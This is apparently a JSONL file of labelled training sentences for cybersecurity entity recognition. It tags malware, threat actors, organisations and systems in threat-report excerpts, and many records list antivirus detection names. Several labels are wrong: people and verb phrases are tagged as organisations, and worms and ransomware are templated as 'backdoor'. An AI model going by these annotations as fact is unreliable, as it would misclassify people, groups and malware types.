{"text": "Tick's most recent attacks have concentrated on the technology, aquatic engineering, and broadcasting sectors in Japan.", "spans": {"MALWARE: Tick's": [[0, 6]], "ORGANIZATION: the technology, aquatic engineering,": [[48, 84]], "ORGANIZATION: broadcasting sectors": [[89, 109]]}, "info": {"id": "cyner2_train_001722", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Backdoor.OnionDuke W32/Trojan3.XZO Trojan.Cozer.B BKDR_COZER.LP Backdoor.Win32.MiniDuke.cb Trojan.Win32.AD.ekdqnf Win32.Backdoor.Miniduke.Lplm BackDoor.CozyDuke.49 BehavesLike.Win32.RansomwareLocky.gh W32/Trojan.QFCN-8527 Backdoor.MiniDuke.av TR/AD.OnionDuke.trltr Backdoor.Win32.MiniDuke.cb Backdoor.MiniDuke", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001723", "source": "cyner2_train"}}
{"text": "FIN4 is a financially motivated threat actor which has consistently targeted this population.", "spans": {"THREAT_ACTOR: FIN4": [[0, 4]], "THREAT_ACTOR: threat actor": [[32, 44]]}, "info": {"id": "cyner2_train_001724", "source": "cyner2_train"}}
{"text": "The newly discovered campaign targets the Indian Ministry of Defense using malicious documents as lures", "spans": {"THREAT_ACTOR: campaign": [[21, 29]], "ORGANIZATION: the Indian Ministry of Defense": [[38, 68]]}, "info": {"id": "cyner2_train_001727", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Worm.Recyl Trojan.Injector.Win32.557110 Worm.Win32.Recyl.afr BehavesLike.Win32.Dropper.rc Worm.Recyl.v TrojanDropper:Win32/Injector.D Worm.Win32.Recyl.afr Worm/Win32.Recyl.R213857 MalwareScope.Trojan-PSW.Game.16 Worm.Recyl!", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001728", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Uztuby.11 Trojan.Uztuby.11 Trojan.Uztuby.11 Trojan.Uztuby.11 Trojan.Win32.Delphi.elmrxd Trojan.Uztuby.11 Trojan.Uztuby.11 backdoor.win32.fynloski.a Backdoor/Win32.fynloski.pwi Trojan.GUSX-6 TR/AD.AVKiller.reish Win32/Remtasu.AI Backdoor.NanoBot! Trojan.Win32.Remtasu Trj/CI.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001732", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Win32.Small!O Hacktool.Hashenfill Trojan.Small.Win32.19365 Trojan.Win32.Small.cpa Trojan.Win32.Small.cwxrxw Troj.W32.Small.cpa!c Trojan.Hooker.21682 BehavesLike.Win32.FakeAlert.xh Trojan/Small.ouz HackTool:Win32/Hashenfill.A Trojan.Win32.Small.cpa Trojan/Win32.Connapts.C256359 Trojan.Small Win32.Trojan.Small.Dxcs Trojan.Small!tZ/zbi7RotE Win32/Trojan.d54", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001733", "source": "cyner2_train"}}
{"text": "It appears the entity behind this campaign took steps to make reverse engineering more difficult and chose the use of Cisco's AnyConnect Client as a lure to trick victims into installing the malware.", "spans": {"THREAT_ACTOR: campaign": [[34, 42]], "SYSTEM: Cisco's AnyConnect Client": [[118, 143]], "MALWARE: malware.": [[191, 199]]}, "info": {"id": "cyner2_train_001734", "source": "cyner2_train"}}
{"text": "A new stealer with keylogging and clipper capabilities is making the rounds on cybercrime forums, according to research by Uptycs threat research team and Shilpesh Trivedi and Tejaswini Sandapolla.", "spans": {"MALWARE: stealer with keylogging": [[6, 29]], "THREAT_ACTOR: cybercrime forums,": [[79, 97]], "ORGANIZATION: Uptycs threat research team": [[123, 150]], "ORGANIZATION: Shilpesh Trivedi": [[155, 171]], "ORGANIZATION: Tejaswini Sandapolla.": [[176, 197]]}, "info": {"id": "cyner2_train_001736", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9828 Trojan.Win32.Fsysna.csibjc Trojan.DownLoader9.58423 BehavesLike.Win32.BadFile.mh Trojan/Fsysna.anj TR/Terzib.wrdas Trojan:Win32/Terzib.A Worm/Win32.Stration.R523 Trj/GdSda.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001738", "source": "cyner2_train"}}
{"text": "El Machete is one of these threats that was first publicly disclosed and named by Kaspersky.", "spans": {"MALWARE: El Machete": [[0, 10]], "MALWARE: threats": [[27, 34]], "ORGANIZATION: Kaspersky.": [[82, 92]]}, "info": {"id": "cyner2_train_001742", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.Lamer.K8 Trojan.Kryptik.Win32.801927 Trojan/Delf.nlr Win32.Trojan.WisdomEyes.16070401.9500.9998 WORM_GATE_GE2300D6.UVPA Win.Trojan.Fileinfector-76 Trojan.Win32.Delphi.danila Worm.Win32.Delf.DA WORM_GATE_GE2300D6.UVPA BehavesLike.Win32.Gate.tc W32.Infector Worm/Win32.Unknown Worm:Win32/Gate.A W32.Lamer.lwJ1 Spyware/Win32.Delf.C43787 W32/Gate.worm Trojan.Cosmu Win32/Delf.NLR Worm.Delf!2LR1nmaG85k Trojan-PWS.Win32.Delf", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001743", "source": "cyner2_train"}}
{"text": "On May 12, at the onset of the WannaCry attack, Cyphort Labs researchers have seen a similar SMB attack to one of our honeypot servers.", "spans": {"MALWARE: WannaCry": [[31, 39]], "ORGANIZATION: Cyphort Labs researchers": [[48, 72]], "SYSTEM: our honeypot servers.": [[114, 135]]}, "info": {"id": "cyner2_train_001744", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Win32.Mramak.A W32.Mkar.A4 Win32.Mramak.A Win32.Mramak.A Win32.Trojan.WisdomEyes.16070401.9500.9981 W32/Mkar.PJKY-3509 W32.Marak Win.Trojan.Mkar-3 Win32.Mramak.A Virus.Win32.Mkar.b Win32.Mramak.A Virus.Win32.Packed.deljve Win32.Mrak.A Win32.Mramak.A Win32.HLLP.Mrak.10 BehavesLike.Win32.Dropper.mc W32/Mkar.L W32/Mkar.b.Dropper Worm:Win32/Mkar.B Virus.Win32.Mkar.b Malware/Win32.Mkar.C408081 Win32/Mkar.B Win32.Virus.Mkar.Agle", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001745", "source": "cyner2_train"}}
{"text": "The attack has been active for more than a year and is ongoing elsewhere, but this particular infection pathway was shut down when the site operator and ad network were notified of the activity.", "spans": {"ORGANIZATION: the site operator and ad network": [[131, 163]]}, "info": {"id": "cyner2_train_001749", "source": "cyner2_train"}}
{"text": "A backdoor also known as: JS:Trojan.JS.Downloader.HZQ Trojan.JS.Downloader.2455.A JS/Nemucod.tm JS/Downldr.HX2!Eldorado JS.Downloader JS/TrojanDownloader.Nemucod.DFV JS_NEMUCOD.ELDSAUHG JS:Trojan.JS.Downloader.HZQ JS:Trojan.JS.Downloader.HZQ Trojan.Script.Heuristic-js.iacgm JS.S.Downloader.1658 JS:Trojan.JS.Downloader.HZQ JS:Trojan.JS.Downloader.HZQ Trojan.DownLoader25.3813 JS_NEMUCOD.ELDSAUHG JS/Nemucod.tm JS/Downldr.HX2!Eldorado Trojan[Downloader]/JS.Nemucod.dfv JS:Trojan.JS.Downloader.HZQ JS/Obfus.S237 Trojan-Dowloader.JS.Nemucod JS/Nemucod.DFV!tr.dldr Win32/Trojan.Downloader.50a", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001750", "source": "cyner2_train"}}
{"text": "MITRE TAGS Action Tag ID App auto-start at device boot T1402 Input prompt T1411 Capture SMS messages T1412 Application discovery T1418 Capture audio T1429 Location tracking T1430 Access contact list T1432 Access call log T1433 Commonly used port T1436 Standard application layer protocol T1437 Masquerage as legitimate application T1444 Suppress application icon T1508 Capture camera T1512 Screen capture T1513 Foreground persistence T1541 DualToy : New Windows Trojan Sideloads Risky Apps to Android and iOS Devices By Claud Xiao September 13 , 2016 at 5:00 AM Over the past two years , we ’ ve observed many cases of Microsoft Windows and Apple iOS malware designed to attack mobile devices .", "spans": {"ORGANIZATION: MITRE": [[0, 5]], "MALWARE: DualToy": [[440, 447]], "SYSTEM: Windows": [[454, 461]], "SYSTEM: Android": [[493, 500]], "SYSTEM: iOS": [[505, 508]], "SYSTEM: Microsoft Windows": [[619, 636]], "SYSTEM: Apple iOS": [[641, 650]]}, "info": {"id": "cyner2_train_001754", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.MSILInject.A4 TROJ_NECURS.SMJ6 Win32.Trojan.WisdomEyes.16070401.9500.9999 Backdoor.Trojan Win32/Inject.fcAMLbC TROJ_NECURS.SMJ6 Trojan.MSIL.Inject.aqjr Trojan.Win32.Inject.ddhqep Troj.Dropper.W32.Injector.m7mC TrojWare.Win32.Zusy.XYN Trojan.Inject1.44093 Trojan.Win32.Inject TR/Zusy.xynynabm Trojan/Win32.Inject Trojan.Zusy.D1889E Trojan.MSIL.Inject.aqjr Trojan:MSIL/Injector.P Dropper/Win32.Necurs.R121870 Trojan.Inject Trojan.Injector Trojan.Injector!AbCu/r2al/E MSIL/Injector.ERR!tr Win32/Trojan.304", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001755", "source": "cyner2_train"}}
{"text": "This targeting is also consistent with previous attacker TTPs; Ke3chang historically targeted the Ministry of Affairs, and also conducted several prior campaigns against India.", "spans": {"THREAT_ACTOR: attacker": [[48, 56]], "MALWARE: Ke3chang": [[63, 71]], "ORGANIZATION: the Ministry of Affairs,": [[94, 118]], "THREAT_ACTOR: campaigns": [[152, 161]]}, "info": {"id": "cyner2_train_001756", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Pws.Gadu.L Trojan-PSW.Win32.Gadu!O TrojanPWS.Gadu Trojan/PSW.Gadu.l W32/PWStealer.FCG Backdoor.Trojan Win.Spyware.8306-2 Trojan.Pws.Gadu.L Trojan-PSW.Win32.Gadu.l Trojan.Pws.Gadu.L Trojan.Win32.Gadu.wwgc Trojan.Win32.PSWGadu.197820 Troj.Psw.W32!c Trojan.Pws.Gadu.L Trojan.PWS.Gadu Trojan.Gadu.Win32.1 BehavesLike.Win32.Trojan.cc W32/PWS.FWUF-5609 Trojan/PSW.Gadu.a Trojan[PSW]/Win32.Gadu Win32.PSWTroj.Gadu.g.kcloud Trojan.Pws.Gadu.L Trojan-PSW.Win32.Gadu.l PWS:Win32/Gadu.H Trojan/Win32.Xema.C89273 TrojanPSW.Gadu Trojan.Pws.Gadu.L Trojan.Pws.Gadu.L Bck/Gadu.Q Win32/PSW.Delf.OQP Win32.Trojan-qqpass.Qqrob.Wxrk Trojan.PWS.Gadu!8+g7gjB8P1Q Trojan-PWS.Win32.Gadu W32/Gadu.L!tr.pws Win32/Trojan.3ea", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001757", "source": "cyner2_train"}}
{"text": "A backdoor also known as: MSIL/Filecoder.EO Trojan-Ransom.FileCoder MSIL/Filecoder.EO!tr Trojan.Ransom.MSIL.1 Trojan.Ransom.SureRansom MSIL.Trojan-Ransom.SureRansom.A Win32/Trojan.Ransom.935", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001760", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Backdoor.Win32.Hupigon!O Win32.Trojan.WisdomEyes.16070401.9500.9960 Trojan.Malcol Win32/Tnega.bcLXSH Trojan.Win32.Slym.cufsch Troj.Rogue.lC4c Backdoor.Win32.Hupigon.rgqw Trojan.DownLoader11.11699 BehavesLike.Win32.Backdoor.vh TR/Rogue.kdv.679349 Packed.Win32.MalPackedSN Win32.Application.PUPStudio.A Unwanted/Win32.HackTool.R40115 Spyware.OnlineGames", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001761", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.FamVT.ShizNHm.Trojan Ransom.TeslaCrypt.WR4 Trojan/Spy.Shiz.nct Ransom_HPLOCKY.SM1 Win32.Trojan.WisdomEyes.16070401.9500.9998 Ransom_HPLOCKY.SM1 Win.Trojan.Blocker-380 Trojan.Win32.Shifu.jt Trojan.Win32.Blocker.dxvhyb Packer.W32.Tpyn.toCt Trojan.DownLoader17.27888 Trojan.Blocker.Win32.32151 BehavesLike.Win32.Ransomware.hz Trojan.Win32.Pariham Trojan.Blocker.iv TR/Crypt.Xpack.whza Trojan[Ransom]/Win32.Blocker Ransom.Locky/Variant Trojan.Win32.Shifu.jt Trojan:Win32/Pariham.A Hoax.Blocker Trojan.Shifu Win32/Spy.Shiz.NCT Win32.Trojan.Shifu.Eehh Trojan.Blocker!epDzUGNGGeo W32/Kryptik.EFAD!tr Win32/Trojan.ff4", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001763", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Rackcrypt Trojan.Graftor.D5D262 Ransom_Rackcrypt.R002C0DKE17 Trojan.Win32.Z.Graftor.1886447 Ransom_Rackcrypt.R002C0DKE17 BehavesLike.Win32.FakeAlertSecurityTool.tc Virus.Win32.Vundo Trojan[Spy]/Win32.KeyLogger.dwl Ransom:Win32/Rackcrypt.A Trj/CI.A Win32.Trojan.Dropper.Wsjz", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001764", "source": "cyner2_train"}}
{"text": "JS/Nemucod usually arrives on an infected machine through malicious spam emails with .zip extensions.", "spans": {"SYSTEM: machine": [[42, 49]]}, "info": {"id": "cyner2_train_001767", "source": "cyner2_train"}}
{"text": "Although it claims to be using asymmetric RSA-2048 to encrypt files, it is making use of symmetric AES instead.", "spans": {}, "info": {"id": "cyner2_train_001769", "source": "cyner2_train"}}
{"text": "The malware performs malicious activities such as reading login credentials, accessing files, keylogging, remote desktop control, and remote control of compromised machines.", "spans": {"MALWARE: The malware": [[0, 11]], "MALWARE: malicious activities": [[21, 41]], "SYSTEM: compromised machines.": [[152, 173]]}, "info": {"id": "cyner2_train_001771", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.Clod14e.Trojan.9d88 Irc.Worm.Golember.V Worm/W32.Golember.34816 I-Worm.Golember.v.n3 Worm.Golember.Win32.8 Trojan/Golember.v Worm.Golember!SM/OEFSeEEs W32/Golember.P IRC-Worm.Win32.Golember.v Irc.Worm.Golember.V Trojan.Win32.Golember.furx Irc.Worm.Golember.V Worm.Win32.Golember.V Irc.Worm.Golember.V BehavesLike.Win32.Dropper.nc W32/Golember.YQQU-9034 I-Worm/Golember.e Worm/Irc.Golember.V Worm[IRC]/Win32.Golember Worm.Golember.v.kcloud Worm:Win32/Flip.A Irc.Worm.Golember.V Win32/Golember.worm.34816 IRCWorm.Golember Win32/Golember.V Win32.Worm-irc.Golember.Aojg IRC/ROSYA.V!worm IRC-Worm/Golember.O Worm.Win32.Golember.AxNU", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001772", "source": "cyner2_train"}}
{"text": "A backdoor also known as: HEUR_PDF.D2 PDF/Trojan.SHCJ-8 possible-Threat.PDF.Acmd", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001774", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Worm/W32.Mintal.309248 W32/Mintal.003 Trojan.Win32.Mintal.hgbj W32.Mintal.Worm Win32/Howeem.A Email-Worm.Win32.Mintal.003 I-Worm.Mintal!SHAyifSwe/s I-Worm.Win32.A.Mintal.309248[h] Worm.Win32.Howeem.A Win32.HLLM.Hwm.3 Worm.Mintal.Win32.1 W32/Howeem.worm W32/Risk.CCZK-5590 I-Worm/Mintal.003 WORM/Mintal.003.A Worm[Email]/Win32.Mintal W32.W.Mintal.003!c Win32/Mintal.worm.309248 Worm:Win32/Mintal.A@mm W32/Howeem.worm Worm.Mintal Worm.Win32.Mintal.Ao Win32.Worm-email.Mintal.Hxqd", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001775", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Backdoor.Lizarbot.FC.2716 Backdoor.IRCBot BKDR_LIZARBOT.SMVJ18 Win32.Trojan.WisdomEyes.16070401.9500.9998 W32/Trojan.QJOG-5659 Backdoor.IRC.Bot BKDR_LIZARBOT.SMVJ18 Win.Trojan.Lizarbot-1 MSIL.Trojan.IRCBot.I Trojan.DownLoader24.64862 Trojan.Zusy.D3A924 Backdoor:MSIL/Lizarbot.A Trojan/Win32.Bladabindi.C230655 Trj/CI.A Trojan.MSIL.IRCBot Win32/Trojan.158", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001776", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.HfsAutoB.FA61 Trojan.Zonidel Win32.Trojan.WisdomEyes.16070401.9500.9990 Backdoor.Trojan Win32/TrojanDownloader.Wauchos.CY BKDR_ANDROM.YYSMQH Trojan.Win32.Zonidel.bko Trojan.Win32.Wauchos.eujxed Win32.Trojan.Zonidel.Agux Trojan.DownLoader25.48331 BehavesLike.Win32.Backdoor.fm W32/Trojan.EGNB-8448 Malicious_Behavior.SB Trojan/Win32.Zonidel Trojan.Win32.Zonidel.bko Trojan:Win32/Koneqzu.A Trojan/Win32.Zonidel.C2210520 Trojan.PasswordStealer Trj/CI.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001777", "source": "cyner2_train"}}
{"text": "Bart has a payment screen like Locky but encrypts files without first connecting to a command and control C C server.", "spans": {"MALWARE: Bart": [[0, 4]], "MALWARE: Locky": [[31, 36]]}, "info": {"id": "cyner2_train_001778", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.Vetor.PE Virus.Win32.Virut.1!O W32.Virut.G Virus.Virut.Win32.27 Win32.Trojan.WisdomEyes.16070401.9500.9997 W32.Virut.CF Win32/Virut.17408 PE_VIRUX.A Virus.Win32.Virut.ce Virus.Win32.Virut.hpeg PE_VIRUX.A BehavesLike.Win32.AdwareYTBlock.mh Trojan-Downloader.Win32.Dldwp Win32/Virut.bn Virus/Win32.Virut.ce Win32.Virut.nf.53248 Virus.Win32.Virut.ce Win32/Virut.F Virus.Virut.06 Win32.Virut.E Virus.Win32.Virut.tt W32/Virut.CE W32/Sality.AO Virus.Win32.VirutChangeEntry.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001780", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32/Risk.VHAX-4717 Backdoor.NetBus.svr Win.Trojan.NBSpy-2 Backdoor.Win32.NBSpy.b Trojan.Win32.Inject.cwlwfo Backdoor.W32.NBSpy.b!c BackDoor.NetBus Backdoor.Win32.Netbus BDS/Netbus.20.F Trojan[Backdoor]/Win32.NBSpy Backdoor:Win32/Netbus.C Backdoor.Win32.NBSpy.b TrojanDropper.Injector Trj/CI.A Win32/Netbus.20.C W32/Netbus.20C!tr Win32/Backdoor.55f", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001782", "source": "cyner2_train"}}
{"text": "While there have been several Suckfly campaigns that infected organizations with the group's custom malware Backdoor.Nidiran, the Indian targets show a greater amount of post-infection activity than targets in other regions.", "spans": {"THREAT_ACTOR: Suckfly campaigns": [[30, 47]], "ORGANIZATION: organizations": [[62, 75]], "THREAT_ACTOR: group's": [[85, 92]], "MALWARE: custom malware": [[93, 107]]}, "info": {"id": "cyner2_train_001787", "source": "cyner2_train"}}
{"text": "EITest: HoeflerText Popups Targeting Google Chrome Users Now Push RAT Malware", "spans": {"SYSTEM: Google Chrome": [[37, 50]], "ORGANIZATION: Users": [[51, 56]], "MALWARE: Push RAT Malware": [[61, 77]]}, "info": {"id": "cyner2_train_001788", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Backdoor/ZAccess.zmv Win.Trojan.Autoit-452 Trojan.Win32.Inject.eyew Trojan.Packed.23726 Trojan.Win32.Inject.eyew Win32/Injector.Autoit.DG W32/Autoit.DG!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001789", "source": "cyner2_train"}}
{"text": "Happy belated birthday to RIG exploit kit! First seen around April 2014, RIG has been in the news several times over the past year.", "spans": {"MALWARE: RIG exploit kit!": [[26, 42]], "MALWARE: RIG": [[73, 76]]}, "info": {"id": "cyner2_train_001790", "source": "cyner2_train"}}
{"text": "As recorded in several other Ursnif campaigns reported since April 2017, this Word document contains several obfuscated VBS files which load malicious DLLs through WMI.", "spans": {"THREAT_ACTOR: Ursnif campaigns": [[29, 45]], "ORGANIZATION: load malicious DLLs through WMI.": [[136, 168]]}, "info": {"id": "cyner2_train_001791", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.VidroKDI.Worm Trojan-Dropper.Win32.Vidro!O Trojan.Vidro.S978560 Dropper.Vedro.Win32.4 Trojan/Dropper.Vidro.aei TROJ_KRYPTIK.SM Win32.Trojan-Downloader.Small.e W32/Trojan2.NPXJ Win32/Vidro.A TROJ_KRYPTIK.SM Win.Trojan.Vidro-11 Trojan.Win32.Vidro.bcqjb Trojan.Win32.Inject.dc Trojan.Inject.8798 BehavesLike.Win32.PWSZbot.qh Trojan-Dropper.Win32.Vidro W32/Trojan.SIZW-6937 TrojanDropper.Vidro.ko Trojan/Win32.Diple TrojanDropper:Win32/Vidro.C Trojan.Heur.ED30AD Dropper.Vidro.32768 Win-Trojan/Vidro.60416.B Trojan.Ahent.0322 Trojan.Vidro Trojan.Vidro Win32/TrojanDownloader.Small.OXH Trojan.Diple!gc4cFvq58+U W32/P2PWorm.HO.worm Backdoor.Win32.Vidro.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001793", "source": "cyner2_train"}}
{"text": "We recently observed a new sample Detected by Trend Micro as TROJ_CVE20170199.JVU exploiting CVE-2017-0199 using a new method that abuses PowerPoint Slide Show—the first time we have seen this approach used in the wild before.", "spans": {"MALWARE: sample": [[27, 33]], "ORGANIZATION: Trend Micro": [[46, 57]], "VULNERABILITY: exploiting": [[82, 92]], "SYSTEM: PowerPoint Slide Show—the": [[138, 163]]}, "info": {"id": "cyner2_train_001794", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan/W32.Starter.49160 Trojan.Win32.Starter!O Trojan.Mauvaise.SL1 Trojan/Starter.ast Win32.Trojan.FakeMicro.d Win32/Chekafe.N TROJ_STRTER.SMUK Win.Trojan.Starter-293 Trojan.Win32.Starter.trq Trojan.Win32.Starter.brvob Trojan.Win32.Starter.65536.C TrojWare.Win32.Starter.clj Trojan.Starter.1524 Trojan.Starter.Win32.261 TROJ_STRTER.SMUK Trojan/Starter.fd TR/Starter.TV Trojan/Win32.Starter Trojan.Starter.1 Trojan.Win32.Starter.trq Trojan:Win32/Chekafev.C Trojan/Win32.Starter.R1734 Trojan.Starter Win32/Spy.Chekafev.AA Trojan.Starter!lzYxQhoD/t8 Trojan.Win32.Starter", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001795", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Dropper Waledac.M Win32.Waledac.b Trojan.Win32.Meredrop!IK Win32/Xema.worm.31232.I Trojan.Win32.Meredrop W32/Waledac.B!tr Injector.CD Trj/Downloader.MDW", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001796", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Ransom.Crowti.MUE.A6 Ransom.Cerber Trojan.Zusy.D3175D Ransom.CryptXXX!g17 Ransom_HPCRYPMIC.SM4 Trojan.Win32.Z.Zusy.92672.FP Trojan.Encoder.5047 Ransom_HPCRYPMIC.SM4 TR/Crypt.Xpack.pzdls Ransom:Win32/Tovicrypt.A Trojan/Win32.CryptXXX.R185958 Trojan-Ransom.Locky Win32/Trojan.f15", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001798", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Multi Win32.Trojan.WisdomEyes.16070401.9500.9999 Backdoor.Trojan Uds.Dangerousobject.Multi!c W32/Trojan.YSQI-3970 Trojan.Symmi.D3C9A Backdoor:Win32/Touasper.A Win32.Trojan.Spy.Efvi W32/Injector.AQM!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001800", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Razy.D3C7E6 Win32.Trojan.WisdomEyes.16070401.9500.9953 BehavesLike.Win32.Trojan.jm Trojan:Win32/Ceatrg.A Trojan/Win32.RemoteAdmin.C2229526 Trojan.MSIL.Bladabindi Trj/CI.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001801", "source": "cyner2_train"}}
{"text": "The attackers compromised the website of the Evangelical Lutheran Church of Hong Kong and modified it to host a malicious iFrame which redirected visitors to another website hosting an exploit of the Internet Explorer Microsoft Internet Explorer Remote Memory Corruption Vulnerability CVE-2015-2502.", "spans": {"THREAT_ACTOR: attackers": [[4, 13]], "VULNERABILITY: compromised": [[14, 25]], "ORGANIZATION: Evangelical Lutheran Church": [[45, 72]], "MALWARE: malicious": [[112, 121]], "MALWARE: exploit": [[185, 192]], "SYSTEM: Internet Explorer Microsoft Internet Explorer": [[200, 245]], "VULNERABILITY: Remote Memory Corruption Vulnerability": [[246, 284]]}, "info": {"id": "cyner2_train_001802", "source": "cyner2_train"}}
{"text": "Detected as TROJ_WERDLOD, this new malware has been causing problems in the country since December 2014 with more than 400 confirmed victims.", "spans": {"MALWARE: malware": [[35, 42]]}, "info": {"id": "cyner2_train_001804", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan-Dropper.Win32.Joiner!O Worm.Rebhip.A8 Trojan/Dropper.Joiner.k TROJ_MULTIDROP.Q W32/Dropper.ANIA Backdoor.Colfusion Win32/TheJoiner.15x.C TROJ_MULTIDROP.Q Trojan-Dropper.Win32.Joiner.k Trojan.Win32.Joiner.epmz Trojan.Win32.Z.Joiner.417292 Backdoor.W32.l8Tn TrojWare.Win32.TrojanDropper.Joiner.K Trojan.MulDrop.32 Dropper.Joiner.Win32.430 BehavesLike.Win32.Downloader.gc Trojan-Dropper.Win32.Joiner W32/Risk.SFJA-2732 TrojanDropper.Win32.Joiner.k Trojan/Win32.Llac.cxsz Trojan-Dropper.Win32.Joiner.k Trojan.Llac Trj/Runner.Joiner.K Win32/TrojanDropper.Joiner.K Win32.Trojan-dropper.Joiner.Lkdg Trojan.DR.Joiner!ZtouwF9CQqA RAT.CyberGate W32/SkyRat.DLE!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001806", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Flood.Vb.DN Trojan/W32.Flooder.20992.B Trojan.Flood.Vb.DN Trojan/VB.dn Trojan.Flood.Vb.DN W32/VirTool.GZ Hacktool.Flooder Win32/Flooder.VB.DN Win.Trojan.Nudgema-1 IM-Flooder.Win32.VB.dn Trojan.Win32.VB.mdnh Win32.Trojan.Vb.Wrhd Trojan.Flood.Vb.DN TrojWare.Win32.Flooder.VB.DN Trojan.Flood.Vb.DN FDOS.IM.451 Tool.VB.Win32.1591 BehavesLike.Win32.Trojan.mh W32/Tool.QSEE-8541 IM-Flooder.VB.fg TR/Flood.VB.DN.1 HackTool[Flooder]/Win32.VB HackTool:Win32/Aflooder.D Trojan.Flood.Vb.DN IM-Flooder.W32.VB.dn!c Trojan.Flood.Vb.DN Trojan/Win32.Xema.N61964869 IMFlooder.VB Trojan-PWS.Win32.Executant.d Malware_fam.gw Flooder.LZ Flooder/Nudge.B", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001807", "source": "cyner2_train"}}
{"text": "In mid-October 2016, he received an unexpected phone call.", "spans": {}, "info": {"id": "cyner2_train_001808", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.MoonLight.Trojan Win32.Emailworm.LW Worm.Lightmoon.MF.213 Win32.Emailworm.LW Worm.VB.Win32.314 W32/VB.by Win32.Emailworm.LW Win32.Worm.VB.a W32/Worm.CIPA-1476 W32.Rontokbro@mm Win32/Lightmoon.D WORM_VB.VV Email-Worm.Win32.VB.by Trojan.Win32.VB.dyztaz I-Worm.Win32.VB.35176 W32.W.VBNA.mhOD Worm.Win32.NoonLight.F BehavesLike.Win32.Trojan.nc W32/EmailWorm.LW Worm.VB.gi TR/BAS.Samca.12113913 Worm:Win32/Lightmoon.H Win32.Emailworm.LW Email-Worm.Win32.VB.by Win32.Emailworm.LW HEUR/Fakon.mwf Win32.Emailworm.LW W32/Moonlight.B.worm I-Worm.NoonLight.F Win32/NoonLight.F Win32.Worm-email.Vb.Hssm I-Worm.VB.WEI", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001809", "source": "cyner2_train"}}
{"text": "One of those binaries was initially thought to be a new variant of the Padpin ATM malware family.", "spans": {"MALWARE: variant": [[56, 63]], "MALWARE: the Padpin ATM malware family.": [[67, 97]]}, "info": {"id": "cyner2_train_001810", "source": "cyner2_train"}}
